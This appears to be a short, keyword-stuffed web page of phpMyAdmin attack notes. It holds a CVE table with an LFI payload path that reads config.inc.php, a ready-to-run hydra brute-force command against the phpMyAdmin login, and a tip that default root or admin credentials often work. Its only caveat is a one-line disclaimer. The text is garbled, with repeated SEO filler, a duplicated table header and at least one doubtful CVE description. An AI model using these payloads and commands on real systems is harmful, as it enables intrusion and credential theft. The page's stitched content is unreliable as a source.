Phpmyadmin Hacktricks Verified ((top))

| CVE | Version | Verified Exploit | |-----|---------|------------------| | CVE-2016-5734 | 4.0.x – 4.6.2 | RCE via preg_replace in table search. Metasploit module available. | | CVE-2018-12613 | 4.8.0 – 4.8.1 | Local file inclusion (LFI) via ?target=db_sql.php%253f/../../config.inc.php | | CVE-2019-12922 | 4.9.0.1 | CSRF + RCE via crafted SQL. |

hydra -l root -P /usr/share/wordlists/fasttrack.txt target http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:token" phpmyadmin hacktricks verified

This information is for authorized security testing only. Always follow responsible disclosure. | CVE | Version | Verified Exploit |

Many installations still use root with a blank password or admin / password . phpmyadmin hacktricks verified